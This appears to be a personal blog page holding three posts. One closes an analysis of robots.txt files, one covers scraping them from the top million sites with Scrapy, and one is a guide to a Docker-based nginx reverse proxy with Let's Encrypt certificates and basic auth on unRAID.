Just because a file or directory is mentioned in robots.txt, it doesn’t mean that it can actually be accessed. However, if even 1% of WordPress installs leave their install.php open to the world, that’s still a lot of vulnerable sites: anyone who finds an unfinished install can complete it and get the keys to the kingdom very easily. The same goes for a .git directory. Even if it is read-only, people accidentally commit secrets to their git repository all the time.

Conclusion

robots.txt is a fairly innocuous part of the web. It’s been interesting to see how popular websites (ab)use it, and which web crawlers are naughty or nice. Most of all this has been a great exercise for myself in collecting data and analysing it using pandas and Jupyter.

The full data set is released under the Open Database License (ODbL) v1.0 and can be found on GitHub.

Sep 19, 2017 · 3 minute read

After reading CollinMorris’s analysis of favicons of the top 1 million sites on the web, I thought it would be interesting to do the same for other common parts of websites that often get overlooked.

The robots.txt file is a plain text file, found at /robots.txt on most websites, which tells web crawlers and spiders how they should scan a website. For example, here’s an excerpt from robots.txt for google.com:

```
User-agent: *
Disallow: /search
Allow: /search/about
Allow: /search/howsearchworks
...
```

The above excerpt tells all web crawlers not to scan the /search path, but allows them to scan /search/about and /search/howsearchworks paths. There are a few more supported keywords, but these are the most common. Following these instructions is not required, but it is considered good internet etiquette. If you want to read more about the standard, Wikipedia has a great page here.
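The order of the lines is not what makes /search/about allowed. Under RFC 9309, and in Google’s documented behaviour, the most specific rule wins: the one with the longest matching path, with Allow winning a tie. Here is a minimal Python sketch of that decision for plain prefixes. It ignores wildcards, and the function name and rule representation are assumptions for this example. One pitfall: Python’s own `urllib.robotparser` applies the first matching rule in file order instead, so it reports /search/about as disallowed for this excerpt.

```python
def is_allowed(rules, path):
    """Decide whether `path` may be crawled under one group of rules.

    `rules` is a list of ("allow" | "disallow", path_prefix) tuples.
    The longest matching prefix wins; on a tie, allow wins.
    Wildcards (* and $) are not handled in this sketch.
    """
    best_length = -1
    allowed = True  # no matching rule means the path is allowed
    for kind, prefix in rules:
        # An empty rule (e.g. "Disallow:") matches nothing.
        if not prefix or not path.startswith(prefix):
            continue
        if len(prefix) > best_length or (len(prefix) == best_length and kind == "allow"):
            best_length = len(prefix)
            allowed = kind == "allow"
    return allowed


# The google.com excerpt above, as (kind, prefix) pairs.
GOOGLE_RULES = [
    ("disallow", "/search"),
    ("allow", "/search/about"),
    ("allow", "/search/howsearchworks"),
]
for path in ["/search?q=robots", "/search/about", "/maps"]:
    print(path, is_allowed(GOOGLE_RULES, path))
```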

In order to do an analysis of robots.txt, first I need to crawl the web for them – ironic, I know.

Scraping

I wrote a scraper using scrapy to make a request for robots.txt for each of the domains in Alexa’s top 1 million websites. If the response code was 200, the Content-Type header contained text/plain, and the response body was not empty, I stored the response body in a file, with the same name as the domain name.
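The three conditions can be written as a single predicate. Here is a minimal, framework-independent Python sketch. The function name and signature are hypothetical and not taken from the actual scraper. It assumes the body is bytes and the Content-Type header is passed in as a string.

```python
def should_store(status, content_type, body):
    """Return True if a robots.txt response should be saved to disk.

    Mirrors the three checks described above: HTTP 200, a Content-Type
    containing text/plain, and a non-empty body. Media types are
    case-insensitive, so the header is lower-cased before checking.
    """
    return status == 200 and "text/plain" in content_type.lower() and len(body) > 0
```

Only a zero-length body is rejected, so a file containing just a newline still counts as non-empty.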

One complication I encountered was that not all domains respond on the same protocol or subdomain. For example, some websites respond on http://{domain_name} while others require http://www.{domain_name}. If a website doesn’t automatically redirect you to the correct protocol or subdomain, the only way to find the correct one is to try them all! So I wrote a small class, extending scrapy’s RetryMiddleware, to do this:

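```python
from random import choice

from scrapy.downloadermiddlewares.retry import RetryMiddleware

COMMON_PREFIXES = {'http://', 'https://', 'http://www.', 'https://www.'}


class PrefixRetryMiddleware(RetryMiddleware):

    def process_exception(self, request, exception, spider):
        # Prefixes already tried for this domain (set by the spider).
        prefixes_tried = request.meta['prefixes']
        if COMMON_PREFIXES == prefixes_tried:
            # Every prefix has failed. process_exception may only return None,
            # a Response or a Request; None lets Scrapy carry on handling the
            # exception as usual.
            return None

        # Pick one of the prefixes that hasn't been tried yet.
        new_prefix = choice(tuple(COMMON_PREFIXES - prefixes_tried))
        # update_request is a helper from the full scraper (not shown here);
        # presumably it rebuilds the URL with new_prefix and records it.
        request = self.update_request(request, new_prefix)

        return self._retry(request, exception, spider)
```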

The rest of the scraper itself is quite simple, but you can read the full code on GitHub.

Results

Scraping the full Alexa top 1 million websites list took around 24 hours. Once it was finished, I had just under 700k robots.txt files:

```
$ find -type f | wc -l
677686
```

That’s 677,686 files, totalling 493MB.

The smallest robots.txt was 1 byte, but the largest was over 5MB.

```
$ find -type f -exec du -Sh {} + | sort -rh | head -n 1
5.6M ./haberborsa.com.tr

$ find -not -empty -type f -exec du -b {} + | sort -h | head -n 1
1 ./0434.cc
```

The full data set is released under the Open Database License (ODbL) v1.0 and can be found on GitHub.

What’s next?

In the next part of this blog series I’m going to analyse all the robots.txt files to see if I can find anything interesting. In particular I’d like to know why exactly someone needs a robots.txt file over 5MB in size, which web crawler is listed most often (either allowed or disallowed), and whether any sites are practising security by obscurity by trying to keep links out of search engines.

Mar 28, 2016 · 3 minute read

Late last year I set about building a new NAS to replace my aging HP ProLiant MicroServer N36L (though that’s a story for a different post). I decided to go with unRAID as my OS rather than FreeNAS, which I’d been running previously, mostly due to its simpler configuration, ease of expanding an array, and support for Docker and KVM.

Docker support makes it a lot easier to run some of the web apps that I rely on, like Plex, Sonarr, CouchPotato and more, but accessing them securely from outside my network is a different story. On FreeNAS I ran an nginx reverse proxy in a BSD jail, secured using basic auth and SSL certificates from StartSSL. Thankfully there is already a Docker image, nginx-proxy by jwilder, which automatically configures nginx for you. As for SSL, Let’s Encrypt went into public beta in December, and recently issued its millionth certificate. There’s also a Docker image, letsencrypt-nginx-proxy-companion by jrcs, which automatically manages your certificates and configures nginx for you.

Preparation

Firstly, you need to set up and configure Docker. There is a fantastic guide on how to configure Docker here on the Lime Technology website. Next, you need to install the Community Applications plugin. This allows us to install Docker containers directly from the Docker Hub.

In order to access everything from outside your LAN you’ll need to forward ports 80 and 443 to ports 8008 and 443, respectively, on your unRAID host. In addition, you’ll need to use some sort of Dynamic DNS service, though in my case I bought a domain name and use CloudFlare to handle my DNS.



nginx



From the Apps page on the unRAID web interface, search for nginx-proxy and click ‘get more results from Docker Hub’. Click ‘add’ under the listing for nginx-proxy by jwilder. Set the following container settings, changing your ‘host path’ to wherever you store Docker configuration files on your unRAID host.

To add basic auth to any of the sites, you’ll need to create an htpasswd file named after the site’s VIRTUAL_HOST, and make it available to nginx in /etc/nginx/htpasswd. For example, I added a file in /mnt/user/docker/nginx/htpasswd/. You can create htpasswd files using apache2-utils, or there are sites available which can create them.
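If apache2-utils isn’t to hand, a password line can also be generated with Python’s standard library. This is a minimal sketch, not the method used in this post. It uses the salted SHA-1 `{SSHA}` format, which nginx’s auth_basic module accepts in its password file. The user name and password below are placeholders, and the file the line goes into would still be named after the site’s VIRTUAL_HOST.

```python
import base64
import hashlib
import os


def htpasswd_ssha_line(user, password, salt=None):
    """Return an htpasswd line in the salted SHA-1 "{SSHA}" format.

    The stored value is base64(SHA-1(password + salt) + salt). A random
    8-byte salt is used unless one is passed in (useful only for testing).
    """
    if salt is None:
        salt = os.urandom(8)
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    encoded = base64.b64encode(digest + salt).decode("ascii")
    return f"{user}:{{SSHA}}{encoded}"


def check_ssha_line(line, password):
    """Check a password against a line produced by htpasswd_ssha_line."""
    _user, _, stored = line.partition(":")
    raw = base64.b64decode(stored[len("{SSHA}"):])
    digest, salt = raw[:20], raw[20:]  # SHA-1 digests are 20 bytes
    return hashlib.sha1(password.encode("utf-8") + salt).digest() == digest


# Placeholder credentials; append the printed line to the htpasswd file.
print(htpasswd_ssha_line("admin", "change-me"))
```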



Let’s Encrypt



From the Apps page again, search for letsencrypt-nginx-proxy-companion, click ‘get more results from Docker Hub’, and then click ‘add’ under the listing for letsencrypt-nginx-proxy-companion by jrcs. Enter the following container settings, again changing your ‘host path’ to wherever you store Docker configuration files on your unRAID host.

Putting it all together

In order to configure nginx, you’ll need to add four environment variables to the Docker containers you wish to put behind the reverse proxy. They are VIRTUAL_HOST, VIRTUAL_PORT, LETSENCRYPT_HOST, and LETSENCRYPT_EMAIL. VIRTUAL_HOST and LETSENCRYPT_HOST most likely need to be the same, and will be something like subdomain.yourdomain.com. VIRTUAL_PORT should be the port your Docker container exposes. For example, Sonarr uses port 8989 by default. LETSENCRYPT_EMAIL should be a valid email address that Let’s Encrypt can use to email you about certificate expiries, etc.
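unRAID sets these through each container’s template in the web interface, but it can help to see the four values side by side. Here is a hypothetical Python helper, with names made up for this sketch. It builds the variables for one container and renders them as `docker run -e` flags, using Sonarr’s default port 8989 as the example.

```python
def proxy_env(subdomain, domain, port, email):
    """Return the four variables nginx-proxy and the companion look for.

    VIRTUAL_HOST and LETSENCRYPT_HOST share one hostname; VIRTUAL_PORT is
    the port the container exposes.
    """
    host = f"{subdomain}.{domain}"
    return {
        "VIRTUAL_HOST": host,
        "VIRTUAL_PORT": str(port),
        "LETSENCRYPT_HOST": host,
        "LETSENCRYPT_EMAIL": email,
    }


def docker_env_flags(env):
    """Render the variables as `docker run -e KEY=VALUE` arguments."""
    flags = []
    for key, value in env.items():
        flags += ["-e", f"{key}={value}"]
    return flags


print(" ".join(docker_env_flags(proxy_env("sonarr", "yourdomain.com", 8989, "you@example.com"))))
```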

Once nginx-proxy, letsencrypt-nginx-proxy-companion, and all your Docker containers are configured you should be able to access them all over SSL, with basic auth, from outside your LAN. You don’t even have to worry about certificate renewals as it’s all handled for you.